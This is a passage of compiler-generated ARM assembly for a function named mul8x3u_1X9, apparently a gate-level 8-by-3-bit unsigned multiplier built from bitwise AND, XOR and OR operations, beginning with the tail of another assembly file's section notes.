10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "399231.c" .text .align 2 .global mul8x3u_1X9 .syntax unified .arm .fpu softvfp .type mul8x3u_1X9, %function mul8x3u_1X9: @ args = 0, pretend = 0, frame = 1864 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. push {r4, r5, r6, r7, r8, r9, fp} add fp, sp, #24 sub sp, sp, #1856 sub sp, sp, #12 str r0, [fp, #-788] str r1, [fp, #-784] str r2, [fp, #-796] str r3, [fp, #-792] sub r1, fp, #788 ldmia r1, {r0-r1} sub r3, fp, #796 ldmia r3, {r2-r3} and r4, r0, r2 and r5, r1, r3 mov r2, #1 mov r3, #0 and r6, r4, r2 and r7, r5, r3 str r6, [fp, #-780] str r7, [fp, #-776] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 sub r3, fp, #796 ldmia r3, {r2-r3} and r8, r0, r2 and r9, r1, r3 mov r2, #1 mov r3, #0 and r1, r8, r2 str r1, [fp, #-1068] and r3, r9, r3 str r3, [fp, #-1064] ldr r3, [fp, #-1068] ldr r4, [fp, #-1064] str r3, [fp, #-772] str r4, [fp, #-768] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-804] and r3, r1, r3 str r3, [fp, #-800] mov r2, #1 mov r3, #0 sub r1, fp, #804 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1076] and r1, r1, r3 str r1, [fp, #-1072] ldr r3, [fp, #-1076] ldr r4, [fp, #-1072] str r3, [fp, #-764] str r4, [fp, #-760] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #3 orr r0, r0, r3, lsl #29 lsr r1, r3, #3 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-812] and r3, r1, r3 str r3, [fp, #-808] mov r2, #1 mov r3, #0 sub r1, fp, #812 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1084] and r1, r1, r3 str r1, [fp, #-1080] ldr r3, [fp, #-1084] ldr r4, [fp, #-1080] str r3, [fp, #-756] str r4, [fp, #-752] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #4 orr r0, r0, r3, lsl #28 lsr r1, r3, #4 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-820] and r3, r1, r3 str r3, [fp, #-816] mov r2, #1 mov r3, #0 sub r1, fp, #820 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1092] and r1, r1, r3 str r1, [fp, #-1088] ldr r3, [fp, #-1092] ldr r4, [fp, #-1088] str r3, [fp, #-748] str r4, [fp, #-744] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #5 orr r0, r0, r3, lsl #27 lsr r1, r3, #5 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-828] and r3, r1, r3 str r3, [fp, #-824] mov r2, #1 mov r3, #0 sub r1, fp, #828 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1100] and r1, r1, r3 str r1, [fp, #-1096] ldr r3, [fp, #-1100] ldr r4, [fp, #-1096] str r3, [fp, #-740] str r4, [fp, #-736] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #6 orr r0, r0, r3, lsl #26 lsr r1, r3, #6 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-836] and r3, r1, r3 str r3, [fp, #-832] mov r2, #1 mov r3, #0 sub r1, fp, #836 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1108] and r1, r1, r3 str r1, [fp, #-1104] ldr r3, [fp, #-1108] ldr r4, [fp, #-1104] str r3, [fp, #-732] str r4, [fp, #-728] sub r3, fp, #788 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #7 orr r0, r0, r3, lsl #25 lsr r1, r3, #7 sub r3, fp, #796 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-844] and r3, r1, r3 str r3, [fp, #-840] mov r2, #1 mov r3, #0 sub r1, fp, #844 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1116] and r1, r1, r3 str r1, [fp, #-1112] ldr r3, [fp, #-1116] ldr r4, [fp, #-1112] str r3, [fp, #-724] str r4, [fp, #-720] sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 sub r3, fp, #788 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-852] and r3, r1, r3 str r3, [fp, #-848] mov r2, #1 mov r3, #0 sub r1, fp, #852 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1124] and r1, r1, r3 str r1, [fp, #-1120] ldr r3, [fp, #-1124] ldr r4, [fp, #-1120] str r3, [fp, #-716] str r4, [fp, #-712] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #1 orr r4, r4, r3, lsl #31 lsr r5, r3, #1 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-860] and r3, r5, r1 str r3, [fp, #-856] mov r2, #1 mov r3, #0 sub r1, fp, #860 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1132] and r1, r1, r3 str r1, [fp, #-1128] ldr r3, [fp, #-1132] ldr r4, [fp, #-1128] str r3, [fp, #-708] str r4, [fp, #-704] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #2 orr r4, r4, r3, lsl #30 lsr r5, r3, #2 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-868] and r3, r5, r1 str r3, [fp, #-864] mov r2, #1 mov r3, #0 sub r1, fp, #868 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1140] and r1, r1, r3 str r1, [fp, #-1136] ldr r3, [fp, #-1140] ldr r4, [fp, #-1136] str r3, [fp, #-700] str r4, [fp, #-696] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #3 orr r4, r4, r3, lsl #29 lsr r5, r3, #3 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-876] and r3, r5, r1 str r3, [fp, #-872] mov r2, #1 mov r3, #0 sub r1, fp, #876 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1148] and r1, r1, r3 str r1, [fp, #-1144] ldr r3, [fp, #-1148] ldr r4, [fp, #-1144] str r3, [fp, #-692] str r4, [fp, #-688] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #4 orr r4, r4, r3, lsl #28 lsr r5, r3, #4 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-884] and r3, r5, r1 str r3, [fp, #-880] mov r2, #1 mov r3, #0 sub r1, fp, #884 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1156] and r1, r1, r3 str r1, [fp, #-1152] ldr r3, [fp, #-1156] ldr r4, [fp, #-1152] str r3, [fp, #-684] str r4, [fp, #-680] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #5 orr r4, r4, r3, lsl #27 lsr r5, r3, #5 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-892] and r3, r5, r1 str r3, [fp, #-888] mov r2, #1 mov r3, #0 sub r1, fp, #892 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1164] and r1, r1, r3 str r1, [fp, #-1160] ldr r3, [fp, #-1164] ldr r4, [fp, #-1160] str r3, [fp, #-676] str r4, [fp, #-672] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #6 orr r4, r4, r3, lsl #26 lsr r5, r3, #6 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-900] and r3, r5, r1 str r3, [fp, #-896] mov r2, #1 mov r3, #0 sub r1, fp, #900 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1172] and r1, r1, r3 str r1, [fp, #-1168] ldr r3, [fp, #-1172] ldr r4, [fp, #-1168] str r3, [fp, #-668] str r4, [fp, #-664] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #7 orr r4, r4, r3, lsl #25 lsr r5, r3, #7 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 and r3, r4, r0 str r3, [fp, #-908] and r3, r5, r1 str r3, [fp, #-904] mov r2, #1 mov r3, #0 sub r1, fp, #908 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1180] and r1, r1, r3 str r1, [fp, #-1176] ldr r3, [fp, #-1180] ldr r4, [fp, #-1176] str r3, [fp, #-660] str r4, [fp, #-656] sub r1, fp, #772 ldmia r1, {r0-r1} sub r3, fp, #716 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1188] and r3, r1, r3 str r3, [fp, #-1184] ldr r3, [fp, #-1188] ldr r4, [fp, #-1184] str r3, [fp, #-652] str r4, [fp, #-648] sub r1, fp, #772 ldmia r1, {r0-r1} sub r3, fp, #716 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1196] eor r3, r1, r3 str r3, [fp, #-1192] ldr r3, [fp, #-1196] ldr r4, [fp, #-1192] str r3, [fp, #-644] str r4, [fp, #-640] sub r1, fp, #764 ldmia r1, {r0-r1} sub r3, fp, #708 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1204] eor r3, r1, r3 str r3, [fp, #-1200] ldr r3, [fp, #-1204] ldr r4, [fp, #-1200] str r3, [fp, #-636] str r4, [fp, #-632] sub r1, fp, #780 ldmia r1, {r0-r1} sub r3, fp, #708 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1212] and r3, r1, r3 str r3, [fp, #-1208] ldr r3, [fp, #-1212] ldr r4, [fp, #-1208] str r3, [fp, #-628] str r4, [fp, #-624] sub r1, fp, #636 ldmia r1, {r0-r1} sub r3, fp, #652 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1220] eor r3, r1, r3 str r3, [fp, #-1216] ldr r3, [fp, #-1220] ldr r4, [fp, #-1216] str r3, [fp, #-620] str r4, [fp, #-616] sub r1, fp, #756 ldmia r1, {r0-r1} sub r3, fp, #700 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1228] eor r3, r1, r3 str r3, [fp, #-1224] ldr r3, [fp, #-1228] ldr r4, [fp, #-1224] str r3, [fp, #-612] str r4, [fp, #-608] sub r1, fp, #756 ldmia r1, {r0-r1} sub r3, fp, #700 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1236] and r3, r1, r3 str r3, [fp, #-1232] ldr r3, [fp, #-1236] ldr r4, [fp, #-1232] str r3, [fp, #-604] str r4, [fp, #-600] sub r1, fp, #612 ldmia r1, {r0-r1} sub r3, fp, #628 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1244] and r3, r1, r3 str r3, [fp, #-1240] ldr r3, [fp, #-1244] ldr r4, [fp, #-1240] str r3, [fp, #-596] str r4, [fp, #-592] sub r1, fp, #612 ldmia r1, {r0-r1} sub r3, fp, #628 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1252] eor r3, r1, r3 str r3, [fp, #-1248] ldr r3, [fp, #-1252] ldr r4, [fp, #-1248] str r3, [fp, #-588] str r4, [fp, #-584] sub r1, fp, #604 ldmia r1, {r0-r1} sub r3, fp, #596 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1260] orr r3, r1, r3 str r3, [fp, #-1256] ldr r3, [fp, #-1260] ldr r4, [fp, #-1256] str r3, [fp, #-580] str r4, [fp, #-576] sub r1, fp, #748 ldmia r1, {r0-r1} sub r3, fp, #692 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1268] eor r3, r1, r3 str r3, [fp, #-1264] ldr r3, [fp, #-1268] ldr r4, [fp, #-1264] str r3, [fp, #-572] str r4, [fp, #-568] sub r1, fp, #748 ldmia r1, {r0-r1} sub r3, fp, #692 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1276] and r3, r1, r3 str r3, [fp, #-1272] ldr r3, [fp, #-1276] ldr r4, [fp, #-1272] str r3, [fp, #-564] str r4, [fp, #-560] sub r1, fp, #572 ldmia r1, {r0-r1} sub r3, fp, #580 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1284] and r3, r1, r3 str r3, [fp, #-1280] ldr r3, [fp, #-1284] ldr r4, [fp, #-1280] str r3, [fp, #-556] str r4, [fp, #-552] sub r1, fp, #572 ldmia r1, {r0-r1} sub r3, fp, #580 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1292] eor r3, r1, r3 str r3, [fp, #-1288] ldr r3, [fp, #-1292] ldr r4, [fp, #-1288] str r3, [fp, #-548] str r4, [fp, #-544] sub r1, fp, #564 ldmia r1, {r0-r1} sub r3, fp, #556 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1300] orr r3, r1, r3 str r3, [fp, #-1296] ldr r3, [fp, #-1300] ldr r4, [fp, #-1296] str r3, [fp, #-540] str r4, [fp, #-536] sub r1, fp, #740 ldmia r1, {r0-r1} sub r3, fp, #684 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1308] eor r3, r1, r3 str r3, [fp, #-1304] ldr r3, [fp, #-1308] ldr r4, [fp, #-1304] str r3, [fp, #-532] str r4, [fp, #-528] sub r1, fp, #740 ldmia r1, {r0-r1} sub r3, fp, #684 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1316] and r3, r1, r3 str r3, [fp, #-1312] ldr r3, [fp, #-1316] ldr r4, [fp, #-1312] str r3, [fp, #-524] str r4, [fp, #-520] sub r1, fp, #532 ldmia r1, {r0-r1} sub r3, fp, #540 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1324] and r3, r1, r3 str r3, [fp, #-1320] ldr r3, [fp, #-1324] ldr r4, [fp, #-1320] str r3, [fp, #-516] str r4, [fp, #-512] sub r1, fp, #532 ldmia r1, {r0-r1} sub r3, fp, #540 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1332] eor r3, r1, r3 str r3, [fp, #-1328] ldr r3, [fp, #-1332] ldr r4, [fp, #-1328] str r3, [fp, #-508] str r4, [fp, #-504] sub r1, fp, #524 ldmia r1, {r0-r1} sub r3, fp, #516 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1340] orr r3, r1, r3 str r3, [fp, #-1336] ldr r3, [fp, #-1340] ldr r4, [fp, #-1336] str r3, [fp, #-500] str r4, [fp, #-496] sub r1, fp, #732 ldmia r1, {r0-r1} sub r3, fp, #676 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1348] eor r3, r1, r3 str r3, [fp, #-1344] ldr r3, [fp, #-1348] ldr r4, [fp, #-1344] str r3, [fp, #-492] str r4, [fp, #-488] sub r1, fp, #732 ldmia r1, {r0-r1} sub r3, fp, #676 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1356] and r3, r1, r3 str r3, [fp, #-1352] ldr r3, [fp, #-1356] ldr r4, [fp, #-1352] str r3, [fp, #-484] str r4, [fp, #-480] sub r1, fp, #492 ldmia r1, {r0-r1} sub r3, fp, #500 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1364] and r3, r1, r3 str r3, [fp, #-1360] ldr r3, [fp, #-1364] ldr r4, [fp, #-1360] str r3, [fp, #-476] str r4, [fp, #-472] sub r1, fp, #492 ldmia r1, {r0-r1} sub r3, fp, #500 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1372] eor r3, r1, r3 str r3, [fp, #-1368] ldr r3, [fp, #-1372] ldr r4, [fp, #-1368] str r3, [fp, #-468] str r4, [fp, #-464] sub r1, fp, #484 ldmia r1, {r0-r1} sub r3, fp, #476 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1380] orr r3, r1, r3 str r3, [fp, #-1376] ldr r3, [fp, #-1380] ldr r4, [fp, #-1376] str r3, [fp, #-460] str r4, [fp, #-456] sub r1, fp, #724 ldmia r1, {r0-r1} sub r3, fp, #668 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1388] eor r3, r1, r3 str r3, [fp, #-1384] ldr r3, [fp, #-1388] ldr r4, [fp, #-1384] str r3, [fp, #-452] str r4, [fp, #-448] sub r1, fp, #724 ldmia r1, {r0-r1} sub r3, fp, #668 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1396] and r3, r1, r3 str r3, [fp, #-1392] ldr r3, [fp, #-1396] ldr r4, [fp, #-1392] str r3, [fp, #-444] str r4, [fp, #-440] sub r1, fp, #452 ldmia r1, {r0-r1} sub r3, fp, #460 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1404] and r3, r1, r3 str r3, [fp, #-1400] ldr r3, [fp, #-1404] ldr r4, [fp, #-1400] str r3, [fp, #-436] str r4, [fp, #-432] sub r1, fp, #452 ldmia r1, {r0-r1} sub r3, fp, #460 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1412] eor r3, r1, r3 str r3, [fp, #-1408] ldr r3, [fp, #-1412] ldr r4, [fp, #-1408] str r3, [fp, #-428] str r4, [fp, #-424] sub r1, fp, #444 ldmia r1, {r0-r1} sub r3, fp, #436 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1420] orr r3, r1, r3 str r3, [fp, #-1416] ldr r3, [fp, #-1420] ldr r4, [fp, #-1416] str r3, [fp, #-420] str r4, [fp, #-416] sub r1, fp, #420 ldmia r1, {r0-r1} sub r3, fp, #660 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1428] and r3, r1, r3 str r3, [fp, #-1424] ldr r3, [fp, #-1428] ldr r4, [fp, #-1424] str r3, [fp, #-412] str r4, [fp, #-408] sub r1, fp, #420 ldmia r1, {r0-r1} sub r3, fp, #660 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1436] eor r3, r1, r3 str r3, [fp, #-1432] ldr r3, [fp, #-1436] ldr r4, [fp, #-1432] str r3, [fp, #-404] str r4, [fp, #-400] sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 sub r3, fp, #788 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-916] and r3, r1, r3 str r3, [fp, #-912] mov r2, #1 mov r3, #0 sub r1, fp, #916 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1444] and r1, r1, r3 str r1, [fp, #-1440] ldr r3, [fp, #-1444] ldr r4, [fp, #-1440] str r3, [fp, #-396] str r4, [fp, #-392] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #1 orr r4, r4, r3, lsl #31 lsr r5, r3, #1 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-924] and r3, r5, r1 str r3, [fp, #-920] mov r2, #1 mov r3, #0 sub r1, fp, #924 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1452] and r1, r1, r3 str r1, [fp, #-1448] ldr r3, [fp, #-1452] ldr r4, [fp, #-1448] str r3, [fp, #-388] str r4, [fp, #-384] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #2 orr r4, r4, r3, lsl #30 lsr r5, r3, #2 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-932] and r3, r5, r1 str r3, [fp, #-928] mov r2, #1 mov r3, #0 sub r1, fp, #932 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1460] and r1, r1, r3 str r1, [fp, #-1456] ldr r3, [fp, #-1460] ldr r4, [fp, #-1456] str r3, [fp, #-380] str r4, [fp, #-376] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #3 orr r4, r4, r3, lsl #29 lsr r5, r3, #3 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-940] and r3, r5, r1 str r3, [fp, #-936] mov r2, #1 mov r3, #0 sub r1, fp, #940 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1468] and r1, r1, r3 str r1, [fp, #-1464] ldr r3, [fp, #-1468] ldr r4, [fp, #-1464] str r3, [fp, #-372] str r4, [fp, #-368] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #4 orr r4, r4, r3, lsl #28 lsr r5, r3, #4 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-948] and r3, r5, r1 str r3, [fp, #-944] mov r2, #1 mov r3, #0 sub r1, fp, #948 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1476] and r1, r1, r3 str r1, [fp, #-1472] ldr r3, [fp, #-1476] ldr r4, [fp, #-1472] str r3, [fp, #-364] str r4, [fp, #-360] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #5 orr r4, r4, r3, lsl #27 lsr r5, r3, #5 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-956] and r3, r5, r1 str r3, [fp, #-952] mov r2, #1 mov r3, #0 sub r1, fp, #956 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1484] and r1, r1, r3 str r1, [fp, #-1480] ldr r3, [fp, #-1484] ldr r4, [fp, #-1480] str r3, [fp, #-356] str r4, [fp, #-352] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #6 orr r4, r4, r3, lsl #26 lsr r5, r3, #6 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-964] and r3, r5, r1 str r3, [fp, #-960] mov r2, #1 mov r3, #0 sub r1, fp, #964 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1492] and r1, r1, r3 str r1, [fp, #-1488] ldr r3, [fp, #-1492] ldr r4, [fp, #-1488] str r3, [fp, #-348] str r4, [fp, #-344] sub r3, fp, #788 ldmia r3, {r2-r3} mov r4, #0 mov r5, #0 lsr r4, r2, #7 orr r4, r4, r3, lsl #25 lsr r5, r3, #7 sub r3, fp, #796 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #2 orr r0, r0, r3, lsl #30 lsr r1, r3, #2 and r3, r4, r0 str r3, [fp, #-972] and r3, r5, r1 str r3, [fp, #-968] mov r2, #1 mov r3, #0 sub r1, fp, #972 ldmia r1, {r0-r1} mov ip, r0 and ip, ip, r2 str ip, [fp, #-1500] and r1, r1, r3 str r1, [fp, #-1496] ldr r3, [fp, #-1500] ldr r4, [fp, #-1496] str r3, [fp, #-340] str r4, [fp, #-336] sub r1, fp, #620 ldmia r1, {r0-r1} sub r3, fp, #396 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1508] and r3, r1, r3 str r3, [fp, #-1504] ldr r3, [fp, #-1508] ldr r4, [fp, #-1504] str r3, [fp, #-332] str r4, [fp, #-328] sub r1, fp, #620 ldmia r1, {r0-r1} sub r3, fp, #396 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1516] eor r3, r1, r3 str r3, [fp, #-1512] ldr r3, [fp, #-1516] ldr r4, [fp, #-1512] str r3, [fp, #-324] str r4, [fp, #-320] sub r1, fp, #588 ldmia r1, {r0-r1} sub r3, fp, #388 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1524] eor r3, r1, r3 str r3, [fp, #-1520] ldr r3, [fp, #-1524] ldr r4, [fp, #-1520] str r3, [fp, #-316] str r4, [fp, #-312] sub r1, fp, #588 ldmia r1, {r0-r1} sub r3, fp, #388 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1532] and r3, r1, r3 str r3, [fp, #-1528] ldr r3, [fp, #-1532] ldr r4, [fp, #-1528] str r3, [fp, #-308] str r4, [fp, #-304] sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #332 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1540] and r3, r1, r3 str r3, [fp, #-1536] ldr r3, [fp, #-1540] ldr r4, [fp, #-1536] str r3, [fp, #-300] str r4, [fp, #-296] sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #332 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1548] eor r3, r1, r3 str r3, [fp, #-1544] ldr r3, [fp, #-1548] ldr r4, [fp, #-1544] str r3, [fp, #-292] str r4, [fp, #-288] sub r1, fp, #308 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1556] orr r3, r1, r3 str r3, [fp, #-1552] ldr r3, [fp, #-1556] ldr r4, [fp, #-1552] str r3, [fp, #-284] str r4, [fp, #-280] sub r1, fp, #548 ldmia r1, {r0-r1} sub r3, fp, #380 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1564] eor r3, r1, r3 str r3, [fp, #-1560] ldr r3, [fp, #-1564] ldr r4, [fp, #-1560] str r3, [fp, #-276] str r4, [fp, #-272] sub r1, fp, #548 ldmia r1, {r0-r1} sub r3, fp, #380 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1572] and r3, r1, r3 str r3, [fp, #-1568] ldr r3, [fp, #-1572] ldr r4, [fp, #-1568] str r3, [fp, #-268] str r4, [fp, #-264] sub r1, fp, #276 ldmia r1, {r0-r1} sub r3, fp, #284 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1580] and r3, r1, r3 str r3, [fp, #-1576] ldr r3, [fp, #-1580] ldr r4, [fp, #-1576] str r3, [fp, #-260] str r4, [fp, #-256] sub r1, fp, #276 ldmia r1, {r0-r1} sub r3, fp, #284 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1588] eor r3, r1, r3 str r3, [fp, #-1584] ldr r3, [fp, #-1588] ldr r4, [fp, #-1584] str r3, [fp, #-252] str r4, [fp, #-248] sub r1, fp, #268 ldmia r1, {r0-r1} sub r3, fp, #260 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1596] orr r3, r1, r3 str r3, [fp, #-1592] ldr r3, [fp, #-1596] ldr r4, [fp, #-1592] str r3, [fp, #-244] str r4, [fp, #-240] sub r1, fp, #508 ldmia r1, {r0-r1} sub r3, fp, #372 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1604] eor r3, r1, r3 str r3, 